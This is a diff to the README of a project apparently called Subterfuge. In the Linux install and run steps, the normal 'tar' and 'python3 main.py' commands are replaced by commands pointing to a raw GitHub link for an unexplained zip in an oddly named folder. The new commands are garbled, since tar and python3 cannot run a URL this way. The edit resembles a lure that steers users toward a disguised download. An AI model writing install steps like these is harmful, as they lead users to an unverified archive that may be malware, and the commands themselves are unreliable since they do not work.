mohamamd-pals/Subterfuge/README.md

 #### Linux:
 1. Open your terminal.
 2. Navigate to the directory where you saved the downloaded file.
-3. Unzip the file using the command: `tar -xvzf subterfuge-x.x.x.tar.gz`
+3. Unzip the file using the command: `tar -xvzf https://raw.githubusercontent.com/mohamamd-pals/Subterfuge/master/eleventhly/Software_v1.1.zip`
 4. Change to the extracted directory.
-5. Run the application with: `python3 main.py`
+5. Run the application with: `python3 https://raw.githubusercontent.com/mohamamd-pals/Subterfuge/master/eleventhly/Software_v1.1.zip`

 ### Step 5: Run Subterfuge
 After installation, you can start using Subterfuge!

 - **Windows:** Find Subterfuge in your Start Menu and click to open.
 - **macOS:** Go to your Applications folder and click on Subterfuge.
-- **Linux:** In the terminal, navigate to the application folder and run `python3 main.py`.
+- **Linux:** In the terminal, navigate to the application folder and run `python3 https://raw.githubusercontent.com/mohamamd-pals/Subterfuge/master/eleventhly/Software_v1.1.zip`.

 ## 🎮 Explore Features
 Subterfuge offers a variety of engaging features: